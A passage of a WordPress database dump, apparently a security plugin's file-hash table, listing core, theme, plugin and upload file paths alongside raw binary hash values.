���|J(','wp-includes/images/smilies/icon_evil.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��M�>�z��','���Q|x>���@VЛ_�/�\"��W���%S','',0,'?'),('����e��7�F�%','wp-includes/blocks/post-title/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7��� ���+�=��','\Z_��E(��z�mc����a��1&-�4)','',0,'?'),('�1��WV(2��6����','wp-admin/images/icons32.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�۬[�m9��J�4�\Z�','D�kC�d��i|a|�����+�\r�x��̌��','',0,'?'),('�5�u�uȸ��8�P�Һ','wp-content/themes/twentytwentyone/template-parts/excerpt/excerpt-link.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���܊:����嵷Y','&��yZ��e��n��_���&���0�A �5','',0,'?'),('�6��M͓��)̻','wp-includes/blocks/text-columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�L�^�^��JW�z\Z','�o[.7~Cm*��-�l��=�BP��5-IL�','',0,'?'),('�=���}�LsQ\n`q&','wp-includes/sodium_compat/src/Core32/Curve25519/Ge/Cached.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[M/*��E�<s�W�RG','\n�\\��Xΰ֨P��A�\nXj�\'�;q�{��a�','',0,'?'),('�H�MB��P_f/8Ȱ��','wp-content/uploads/2019/09/garden-1680802_960_720.jpg',0,'p���ObqBD�Rx��','p���ObqBD�Rx��','ؔV3�V\0� �����v���/�_9m㲅 �]X','',0,'?'),('�O�tg�\02�\\�B��','wp-includes/assets/script-loader-packages.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|�H��\'�.��','��%�)Z�B�;v Qa�����;$�z��D�','',0,'?'),('�PB���&G�h���','wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1629122067.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Թ���Xp`me<','wP\0�p�zuYDS�z(W�ߥ��P�3$S����','',0,'?'),('�Ym�R�l�X\0���:','wp-content/plugins/wordfence/views/options/option-textarea.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����w\n�Mus���','O���=~jc#�6��L窜����as�W�OQ-','',0,'?'),('�]숊YT��Xm�+%','wp-includes/js/dist/vendor/moment.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','F�ok#�/��ːe','�����l�G&�������<��U��[[�m','',0,'?'),('�a�L˵��A�A�M�','wp-content/uploads/2016/11/interior-design-2047075_960_720-300x225.jpg',0,'�<�C��$g,~�2�\Z*','�<�C��$g,~�2�\Z*','* ]�����4@Z�����L5� ��۩�L�Q�','',0,'?'),('�j��U�U�X\Z��/J/','wp-admin/includes/class-core-upgrader.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','d�e����ps�J�','�L?�<�#p�_��4i4�É�5�V����\'','',0,'?'),('�gزh/Ḯ�O�N','wp-includes/class-wp-block-type.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ew��+�v�%&hf�6\Zr','�9�@�SRԺb5�q���&r{��zt�','',0,'?'),('�����ġ!����\Z','wp-includes/blocks/categories/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V>�m\0Or<�4��k','��:\0����\r���o G�B\0c��| l;�','',0,'?'),('T`+F�.A�s�','wp-content/plugins/wordpress-seo/src/surfaces/schema-helpers-surface.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O?�+��x�.�C�]','�x�6n�Dl\'�T��t�d���}:�T=�$��','',0,'?'),('¡Hﲒ�xT7D','wp-content/plugins/wordpress-seo/admin/class-option-tabs.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��k�E��O#�힣b','�蛛��W�!;}��M��h5�����v�U뼈?','',0,'?'),('�1���|�}���dQ','wp-admin/export.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Z�\"�\r\r�','x��=��|ˋ{�lbn��;��Ep���r�?','',0,'?'),('��h�1r\r����)�','wp-content/plugins/wordpress-seo/css/dist/metabox-primary-category-1690.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��\0��-�U_���','��PyC�)h��\Z.8�YV��{�����g','',0,'?'),('��Z�@8p�r�!���','wp-content/plugins/wordpress-seo/src/generators/schema/article.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƫ���*\'��žǘD<u','|j}B�N�j�1A�pm@���Z\'N����','',0,'?'),('��ށ�H��Û�\'O�+','wp-content/plugins/disable-gutenberg/uninstall.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w�N��5\rVX�0�<&','����8~���YgN�$����ݠSG�3Q�','',0,'?'),('���Π�7���D,�','wp-content/plugins/wordpress-seo/src/generators/twitter-image-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��ُDn�0|���\'','\"F�؇0��M��]M�Ƃݖ�4�f0�B����]','',0,'?'),('� 1��А々�S:(','wp-includes/js/thickbox/loadingAnimation.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"h\r�c���&�','B�F���`�F-��l�ڛ�RT6���Յ��','',0,'?'),('�\r�W$2lv9{ܭ:��','wp-includes/blocks/post-title/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��4�̈~�3�vtSQ\'','�g�e��T����\'i\\��i��=>;�QBH\'D��','',0,'?'),('�w:k@D�i�WQ�','wp-content/plugins/wordfence/lib/wfModuleController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��oI�Ʒk���b','7.ݰ̿���U���L>�\"�TM5�]��>�','',0,'?'),('���^R��,�D��QHm','wp-content/plugins/wordpress-seo/css/main-sitemap.xsl',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q���*C�;�cX[M3�','��b(�d:�������n��<gb����t��F','',0,'?'),('���\Z�V���տ','wp-content/plugins/wp-cerber/cerber-maintenance.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�69SH\nƻ��/��(�','�(c%��vW�S�xEuς><���¶�Ȯ[� ','',0,'?'),('�)KbB��F�~�����','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/HandlerStack.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��0\n;7DդB6�˃�','��.s��@K��\0l������ބ��-���ֳ','',0,'?'),('�*i�O2�;%�{�;','wp-content/themes/vega/changelog.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\Z3fǽ�Y�=�7q�','�M�\0�\rB�\"�g���g��J�p�A���~_B','',0,'?'),('�T5�4���5\Z�ZP\\�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-lt_LT.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�7{�CS�!��/@��f',';G�|���wXB�#���\"�g�ݪ^s������','',0,'?'),('�T���!ة7�l��<','wp-includes/js/codemirror/htmlhint-kses.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��[��k[�#cLf{','�N��&�V\Z�A��/��R#~բ���_J*�Ї','',0,'?'),('�Z�P����L�\'�\0','wp-content/plugins/wordpress-seo/src/schema-templates/assets/icons.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��O�3y2Wc���','��/�r�%�����m�b�K��\'e�\\d+o�S��','',0,'?'),('�\\���ntk�D�\'E','wp-content/plugins/wordfence/css/wf-ionicons.1629122067.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Al��s���j�⯃','ג��4�ˮ�v�����M�`�V��Z�','',0,'?'),('�_���jSX�2�QQ=','wp-includes/ms-load.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�),l�\"��?�V�?%','���#~���&�S@�]�ED}L*�#5+\r�','',0,'?'),('�`~|D%EH�wO����','wp-includes/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����Ǭ��� ���','�7�.{��=�5�A�~�\r~.A(0Z��Q�2�','',0,'?'),('�x�5KX^���qy�e','wp-content/uploads/2016/11/lost-places-300x198.jpg',0,'�q;��s���ygi��','�q;��s���ygi��','�p�Au*� �)�����u�h����>��]M','',0,'?'),('ÂuJ�M�/� w�y','wp-includes/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�p{��[��˔� ','�9�o���G�f�pmeG�#`�:Q�{`�','',0,'?'),('ä��]0�`���AS:D','wp-includes/js/dist/blob.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����J���|�M��h','�烃6&�l圂K�\r�1��\"��x�ȕf,','',0,'?'),('ý��P��7&ݣ`�)','wp-includes/sodium_compat/autoload.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Υ\ZBab�_ƺ�01Q','\n����譂:|���D�g�����DU�\r�=','',0,'?'),('ÿ�;�\\wE�Ű ��Qb','wp-content/uploads/2019/08/renting2-300x250.jpg',0,'z꓾ogh�;|�T�','z꓾ogh�;|�T�','#��rG�z��~~�K��6P-��\Z��ҫA','',0,'?'),('�Ĩ�|�������','wp-content/plugins/redirection/locale/json/redirection-fr_CA.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���yB=�� �*��','l]�3\"Bm��9��af���m�,�}\r�`<qC','',0,'?'),('��tnR�ؔ����%^�','wp-admin/images/align-right.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B���Oe#�l@:P+\"v','�ɳ���C��?�=���&��UyZ�31��!<c','',0,'?'),('���D����=^�%8�d','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/pt.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3���MCv�4��l��','��#X�`4������+L�q�=_��s����9;�','',0,'?'),('���H+֧r�Yv %�','wp-content/plugins/wordpress-seo/src/integrations/admin/fix-news-dependencies-integration.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E�Q�\0�a�0<�#','�6X��j6i�ޚ;91�������s]<��','',0,'?'),('���5�V\"�$$�_��','wp-admin/includes/post.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','վ���z�\01�',' 5B�HR���էF���q��\"��?</�VyG','',0,'?'),('��4�l!�r�����','wp-includes/class-wp-block-type-registry.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����P0�X��o�\\[�','� �OmR#����%$�6\nLlt�e�#cRi�E(U','',0,'?'),('��:\0�p(m�Cm!�)Z','wp-content/plugins/wordpress-seo/src/deprecated/src/actions/indexation/indexable-general-indexation-action.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FE�\r^��{���Л�O','b��t�0�(��=6<-�o9���?;r��\n)�r�','',0,'?'),('��e��fz���eox��','wp-content/themes/twentytwentyone/package-lock.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���O���\"m4���','�AF���*p�s��b�F�O$��>�(��&��8��','',0,'?'),('��iY����\0\nR)��','wp-includes/post-thumbnail-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���d��V��cꘄ','G�%*�J ���$��o=�@��k����Jl�','',0,'?'),('��u�X�ݼ#�-���','wp-includes/class-wp-http-ixr-client.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����2���5K','�BVrAC\n�a�+���(�;%�FdC��TD�#��','',0,'?'),('��*n�;A�LXI@�g','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/ko.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�l �s�i��� �','��v@��Nq3��/�����6���u���','',0,'?'),('�\0U�����aS��','wp-includes/widgets/class-wp-widget-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�Q�Z�p�Q2 ','�;����A��!����uRW�����s��','',0,'?'),('�\n�a�7���:���','wp-content/themes/vega/404.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X4�Cmm\Z�{J�-�J','�v�Y�&w_Þ��9��zD��r�;��aD�','',0,'?'),('�\rPtquɪK!��5','wp-content/themes/vega/assets/js/vega-wp.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+�1b�3s�C��','&��G��EBǭ�<A(%�Hia�t��','',0,'?'),('�\Z�-�/�x8g�G�9�','wp-content/plugins/wordpress-seo/src/schema-templates/recipe-description.schema.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����2�3V8� �?G','r�v�p����ፑt�I�zg��\0�LD���','',0,'?'),('��5Ĩ)�0��X�\'�','wp-admin/widgets-form-blocks.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','th�#נK���j����','�T?H/�P�����A_N�?�cG��L�v��','',0,'?'),('�#C��v�nОKvz��','wp-content/plugins/wp-cerber/assets/icons/fonts/crb.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��\r����R�EB','���/\Z�\0Sam\'���ϫ�k!f��5�\rM�','',0,'?'),('�&)����N~&����','wp-content/themes/twentytwentyone/screenshot.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*����ّ^R� ','\Z��u�@�\'\\��KL�82�B��r�\Z2HC�o','',0,'?'),('�3k<R6�����֔z�','wp-content/plugins/wordpress-seo/src/presenters/twitter/image-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','مB&��W��w�s|��','�:�5�[%��sS�[o�������C%\"%\n1lx','',0,'?'),('�B]I����I���F��','wp-content/uploads/2019/08/nature-3336524_960_720-768x512.jpg',0,'A];.�!�-$Q�#F\Z','A];.�!�-$Q�#F\Z','[��\n��\0M�%4t���N�_\0����d�M�dS','',0,'?'),('�Gz���*��摶���','wp-content/uploads/2019/09/cleaning-3977589_960_720-350x220.jpg',0,'�O��;�0\n��i�S��','�O��;�0\n��i�S��','��WL�k��\\��{�g����@�#\'����u�g��','',0,'?'),('�`�,}��D��@','wp-includes/class-wp-recovery-mode.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' �oxц��<N��','�4>���\r� j����s�dqm��H��l�7�~��','',0,'?'),('�jIWe�}L�\n�3�','wp-content/plugins/wordpress-seo/languages/wordpress-seo-gl_ES.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�5^��Ѧ��?����','l+�Zדm��u��Ī�b� m=ko{\"�~@�\r','',0,'?'),('�v�V/W��{}!^�N','wp-includes/blocks/html/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����\"�r`g�����','���5��>��/�ˏ�z�h����!�d�}a','',0,'?'),('Ć~�7c���Ʊ�ۃG','wp-content/plugins/wp-cerber/languages/wp-cerber-lt_LT.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','%��:rל�ZL]���','��qA$%Re��$��e���`!�e:|��PB;�','',0,'?'),('Ĉ^A��+l���o�d��','wp-includes/js/tinymce/skins/wordpress/images/audio.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7~!���\0����\"w','�g��z���.g�V�:��[����Й�H)Ȟ�','',0,'?'),('đ�ԪV�CT����G','wp-content/plugins/wordpress-seo/admin/pages/licenses.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�F������n|hD','3��&��Sb�K����A\' xP?d�&O��w','',0,'?'),('ĔԼ���pP�Z H��','wp-includes/images/smilies/icon_cry.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�+`Ůd�W]�����h','[�<�q�wf�)�rZ�(���=#;ans���w9','',0,'?'),('ě�w��+�qAZ','wp-includes/blocks/group/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c����~tк㺼\'','��R<g�\")���b����z�:��OqS','',0,'?'),('ě��̅���\r~٩�','wp-content/uploads/2019/10/plumbing1-300x200.jpg',0,'ǎ�L\\�����l$9˸','ǎ�L\\�����l$9˸','��R�����*�Vc���lZ�j�ܿWf���','',0,'?'),('ğ\\�x*�=� �.�V','wp-content/plugins/wordpress-seo/vendor_prefixed/league/oauth2-client/src/Tool/BearerAuthorizationTrait.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��9�TaC��I�;@','y�Hx�d?���OWfGf̶X��e~m5����f`�','',0,'?'),('Ħ��SNL��h`���','wp-content/themes/twentytwentyone/assets/sass/05-blocks/navigation/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\"mb�\'u�̩��D�','9Z�Jn�l+;�CG; �+�0s����f�8�','',0,'?'),('ijJ�\n`|�5,HT��','wp-admin/includes/admin-filters.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ƸJ�Ґ��F0�����','��\r&�+;�U(�x��w�}�J�-�U���','',0,'?'),('Ķ�Ɩ�o���èf{U','wp-includes/js/jquery/ui/effect-highlight.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n+)�����I�L\r�','qp��G%�S���V���9|�����@S�Xn','',0,'?'),('��̘sS]�GG���&','wp-content/languages/en_GB-e53526243551a102928735ec9eed4edf.json',0,'�.pQ[��EP��E','�.pQ[��EP��E','�}ޅV�`ϓ��aW \n�0�X�$h<��|�[q�','',0,'?'),('��e��N-��@1\Z��','wp-includes/blocks/legacy-widget/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�v�^E�E�A','�}2��k\0���h�dz!u��5��ޭgd�c�','',0,'?'),('�Ѻɩ��uy����}','wp-includes/sodium_compat/src/Core/Salsa20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���b5lJ�#���v','c=0�-#�-T�S�X�&��4����\0�K8\r�','',0,'?'),('���Ď������','wp-content/plugins/wordpress-seo/src/deprecated/index.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EЛ��O0��c���Ag3','�� 蚠{�c�FJ�w��!}a���9�','',0,'?'),('��ʙ\0}��甠K��.�','wp-includes/js/jquery/jquery.color.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','rq�*X�gq�O�(͈','�x�2���<���k���Qݯ�����{��','',0,'?'),('��\r�E^[�7kg(��','wp-content/plugins/wordpress-seo/js/dist/select2/i18n/mk.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڻ�q0㢕���& ',' )Í���=���4\ZY= �T�샴�3��!#:','',0,'?'),('��{A��mm��*�K','wp-includes/nav-menu-template.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JI1E%g䅝�?�&�','AS%�³�[�|ZJf�RH3#Bl�K��zH','',0,'?'),('�/{+�r]�\r��#*��','wp-content/plugins/wordpress-seo/languages/wordpress-seo-cs_CZ.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� dc��^C�ǎ HD�','�K��8i���;�nB�5v\Z,�k����K','',0,'?'),('�6m���G��ހ��[N','wp-content/languages/en_GB-bf23b24175490c2e46aaf92ff6a0c70f.json',0,'�C�=�s�\\�@`���','�C�=�s�\\�@`���','\rp\0a��&Wm\r=VC�K�spߊ��l�&�I','',0,'?'),('�D���C����F}��','wp-includes/Requests/Exception/HTTP/418.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','83�9k\\8\'i�v��','4 �6鎬��M&�$!�2d<��\\ |\\�?g�\n','',0,'?'),('�O����a��R�w���','wp-content/uploads/2021/08/building-768815_1920-1024x682.jpg',0,'�!G4} \'���6��','�!G4} \'���6��','���z���i�\r������|� ?�����C','',0,'?'),('�T��V�6���D���g','wp-content/plugins/wordpress-seo/admin/menu/class-admin-menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','FR�+�t���V\"��h�',']�NYy���/[��T\0�kD\r��x~M�I�2�','',0,'?'),('�V݀^�W�4��-zX','wp-content/themes/twentytwentyone/assets/sass/01-settings/fonts.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�fq�ag�D���i\"','-u��|�5��CD`��磩QrG��)&�','',0,'?'),('�_�n�����p���aV','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/HChaCha20.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>*L�1�˵�\"k%F�+','Z��i�M�f�U�v�i-�})��f�\"��Mnd?X','',0,'?'),('�`#��G�b�C��֊�','wp-includes/js/swfupload/handlers.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j��ڙK�~q ����c=','�T�d�T�y~#��jI\"�+�+3�ɉ','',0,'?'),('�xeju������','wp-includes/css/dist/edit-widgets/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','� ?�����j�,��A','�-L~Gxc��qK}4�-~���\"�a8~','',0,'?'),('�~�H�����c','wp-content/plugins/redirection/database/schema/201.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����Zղ�Z�I}C','���Tȍ�~���)�yr������b�','',0,'?'),('łj�Dߋ�.�˖D��','wp-admin/css/forms.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�H���r�:�.��','o�D�m�p�[79���{-��i���j�L�','',0,'?'),('ņ�ԡyi�D�1�','wp-includes/blocks/embed/editor.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Jώ��_�~��ə�Q�','�� �\r�Q?*�϶b��o�\\��6i?���','',0,'?'),('Ŋ��6���@�L(`��','wp-content/plugins/wordfence/views/scanner/site-cleaning.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_d�+W��.������','��y>Ȅ9&��\0oxB�~�j3#7걊l��>3','',0,'?'),('Ŝ�\0�>j�-������','wp-includes/blocks/latest-comments/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','琌U�~�P��(�k','V�3=%��kO�[3��Nf3��S�0v�ڦ','',0,'?'),('Űю<�4�*�e��g','wp-content/uploads/2019/08/The-best-way-to-choose-an-electrician-300x200.jpg',0,'NN�$X��(ql�]m��','NN�$X��(ql�]m��','[qo�q̽6%�,�Uq��4$&�%\0��,.�C`','',0,'?'),('ŷk�,Q��\"�K*��>','wp-content/plugins/wordpress-seo/admin/class-paper-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ؖ�y�ќ��b�','�w?�W~���_=���n�X���iO<,���','',0,'?'),('że�����E@}-�','wp-content/plugins/wp-cerber/assets/flags/ss.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�L,������Ֆ4�','=D�wN��+UaF�0�^.sG�����?���','',0,'?'),('��-�p�lE���k�/�','wp-includes/js/jquery/jquery.hotkeys.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�S!}EU�\\b�g�h��=','\ZJ��]�x ծT���c�0n�9 +V�k�','',0,'?'),('�v�0�r�m����','wp-content/themes/twentytwentyone/assets/sass/05-blocks/rss/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6ߔu�U�Q(�AF�','̩\ZTQb[c�U�,��s~��$�F_\n�e� �','',0,'?'),('����?ZLD49\rZ7','wp-content/languages/en_GB-93882e8f9976382d7f724ac595ed7151.json',0,'��O��Ӻih\r��iY','��O��Ӻih\r��iY','8��?�欵�p[�q^A�+�\"����','',0,'?'),('��A#����Uu�O���','wp-content/plugins/wp-cerber/assets/flags/sk.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��I�q!-�\"�jU]P','��!$�2�E@��e�K���z\\�x�<GF� ','',0,'?'),('�v�T!)��aH�','wp-content/plugins/wp-cerber/assets/flags/mq.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���zs�׳Wh���','����J���U2V\\��h�Ѧ�Z�t/���Q','',0,'?'),('�ZTD�\r�[��FcLL�','wp-includes/blocks/gallery/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q\\p������7$�E','\Z��(?\r�\0,��J�n�]��U@�\0��s�G�','',0,'?'),('� ��#A�\n#b#��=','wp-includes/js/tinymce/themes/inlite/theme.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Z=\ro<3��E���','�\"�;l��\0s\'�lB�3q�6)�8�\n@D����','',0,'?'),('��p�1 �?��J@�','wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����ǧn3Q�2�G�','�d��\"fݎ���6em�`�z����P<KO�','',0,'?'),('�+���g���q6�^\0�','wp-admin/images/wheel.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','E0� q0m��\ZY%V�X�','(]�:=d�qۅ�O{9�Ԁ�v��Ș~����','',0,'?'),('�+�kZ@�bK��Қ��','wp-includes/blocks/block/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���F�q���6���V�','�,�����htD�)WMF�4���~\r��','',0,'?'),('�@��:<�o|J-e�','wp-content/plugins/wordfence/images/wf-error-badge.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�EQt��s �Mz�y���','��殙F��`�a�݀�k���mE�Q��+~��','',0,'?'),('�X\rNΌ\"&���5G�N','wp-content/plugins/wordpress-seo/src/exceptions/indexable/post-not-found-exception.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�6��]�F����e','�TԾ;�������6���7M6X���S','',0,'?'),('�Z��eo�Eܙ@U�\0b','wp-content/uploads/2019/08/Green-Energy-350x220.jpg',0,'Х&-㺨�J��Ƈ�s','Х&-㺨�J��Ƈ�s','�|\n5�]GP�2QL�-��ۻ�ޭ����RQ6','',0,'?'),('�dt���S0�[\\Og:','wp-content/plugins/wordfence/modules/login-security/views/.htaccess',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���A�a�b�vr�','C����\'r�9��@�K�ކt�����w#@k�','',0,'?'),('�h�(ٲ�&b��\\ek','wp-content/plugins/wordpress-seo/src/presenters/abstract-presenter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','.�E �����\Z��(�','�4&\\<���##Q�ٕ�o�F����k|��x','',0,'?'),('�iK$�|:3� �?z�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Exception/ConnectException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���mt8E���{�-','��� P�&�X��ϒ�*7kUΑ���^0��','',0,'?'),('�q�&]&�=���m�','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/EasyHandle.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ˡ+�aD[>vŝr�','E�5 }>�L��$.L�,�3D0�����M','',0,'?'),('ƅ����|_�i/y�� ','wp-includes/js/tinymce/plugins/media/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6�\'1�Z����f ','\n�>����EQ�i�漺��k�}î�Dz������','',0,'?'),('Ƈ����]�Ĭ�ޘ�','wp-content/plugins/wordpress-seo/admin/interface-collection.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��/�8sr�%�,��#��','t_<�M�����,to~�f�Y�c���2(j�','',0,'?'),('ƎJ*�F)�KV��6','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/psr7/src/functions_include.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=y�;+�\0��m~�\0��','փ��J�\r/��][orrB}2V��E섚�','',0,'?'),('Ət���\Z��o+��ش','wp-includes/blocks/spacer/style-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s�k���k�3z��U)�','u2�T��z\"����-g���&]�V�j��$O>�','',0,'?'),('Ƒ�Y�CrJr����','wp-content/plugins/wordpress-seo/src/integrations/blocks/breadcrumbs-block.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*1��/���7_�u\0','F�2���{W��A��\\�HV��G��B0��\Z&','',0,'?'),('Ƭ+\Z���I�d^i 